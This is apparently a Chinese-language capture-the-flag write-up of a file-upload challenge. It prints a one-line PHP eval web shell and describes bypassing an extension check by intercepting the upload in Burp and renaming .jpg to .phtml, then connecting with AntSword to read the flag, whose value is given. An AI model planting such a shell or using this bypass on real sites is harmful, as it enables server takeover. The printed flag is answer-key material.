- 打开靶机
- 猜测是一个upload文件上传漏洞,那么我们的基本思路就是:上传一个php文件,phtml文件,在去用中国蚁剑来连接终端,查看里面的flag
- 查看页面的checkfile函数
- 我们直接上传文件只能采用.jpg|.png|.gif格式
- 我们需要去Brup抓包,然后修改文件格式,在发送包
- 首先写一个webshell.txt
<?php @eval($_POST['shell']);?>
- 后缀修改为jpg,上传文件
- Brup抓包,修改为phtml,在发送包
(这里试过php,会显示bad file)
- 修改为phtml,就好了!
- 并且得到了文件上传的地址
- 中国蚁剑测试连接
- 打开虚拟终端,寻找flag
flag{20a7f9e5-e489-4f91-840d-0fb7155bd2a7}